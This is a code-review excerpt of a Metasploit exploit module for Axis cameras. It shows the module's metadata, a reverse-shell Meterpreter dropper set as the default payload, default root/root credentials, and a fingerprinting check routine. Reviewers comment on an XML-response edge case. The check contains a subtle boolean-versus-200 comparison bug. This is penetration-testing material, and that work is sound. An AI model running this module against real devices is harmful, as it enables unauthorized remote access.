modules/exploits/linux/http/axis_app_install.rb

```diff
@@ -0,0 +1,254 @@
+        ],
+        'DisclosureDate' => '2018-04-12',
+        'Platform' => ['linux'],
+        'Arch' => [ARCH_ARMLE],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_ARMLE],
+              'Type' => :linux_dropper,
+              'Payload' => {
+              },
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 80,
+          'SSL' => false
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+    register_options([
+      OptString.new('TARGETURI', [true, 'Base path', '/']),
+      OptString.new('USERNAME', [true, 'The username to authenticate with', 'root']),
+      OptString.new('PASSWORD', [true, 'The password to authenticate with', 'root'])
+    ])
+  end
+
+  # Check function will attempt to verify:
+  #
+  # 1. The provided credentials work for authentication
+  # 2. The remote target is an axis camera
+  # 3. The applications API exists.
+  #
+  def check
+    # grab the brand/model. Shouldn't require authentication.
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, '/axis-cgi/prod_brand_info/getbrand.cgi')
+    })
+
+    return CheckCode::Unknown unless res && (res.code == 200)
+
+    body_json = res.get_json_document
+    return CheckCode::Unknown if body_json.empty? || body_json.dig('Brand', 'Brand').nil?
+
+    # The brand / model are now known
+    check_comment = "The target reports itself to be a '#{body_json.dig('Brand', 'Brand')} #{body_json.dig('Brand', 'ProdNbr')}'"
+
+    # check to see if the applications api exists (also tests credentials)
+    res = send_request_cgi({
+      'method' => 'GET',
+      'username' => datastore['USERNAME'],
+      'password' => datastore['PASSWORD'],
+      'uri' => normalize_uri(target_uri.path, '/axis-cgi/applications/list.cgi')
+    })
+
+    # A strange edge case where there is no response... respond detected
+    return CheckCode::Detected unless res
+    # Respond safe if credentials fail, to prevent the exploit from running
+    return CheckCode::Safe('The user provided credentials did not work.') if res.code == 401
+    # Assume any non-200 means the API doesn't exist
+    return CheckCode::Safe(check_comment) if res.code != 200
+
+    # This checks for an XML response which I'm not sure is smart considering most of the device
+    # does JSON replies... the concerning being that this response has changed in newer models
+    return CheckCode::Safe(check_comment) unless res.body.include?('<reply result="ok">') != 200
```

Comment:
Given the comment here we may want to consider doing some more testing if this might be a concern.

Reply:
The tested camera is on LTS into 2025. It isn't a huge concern, but worth noting for future readers. I'm also not buying more cameras to test this edge case 🤣

Reply:
Haha fair fair and yeah wasn't too concerned about it was more just seeing if you wanted to investigate it further or not. Marking resolved due to emulation difficulties n time constraints for now.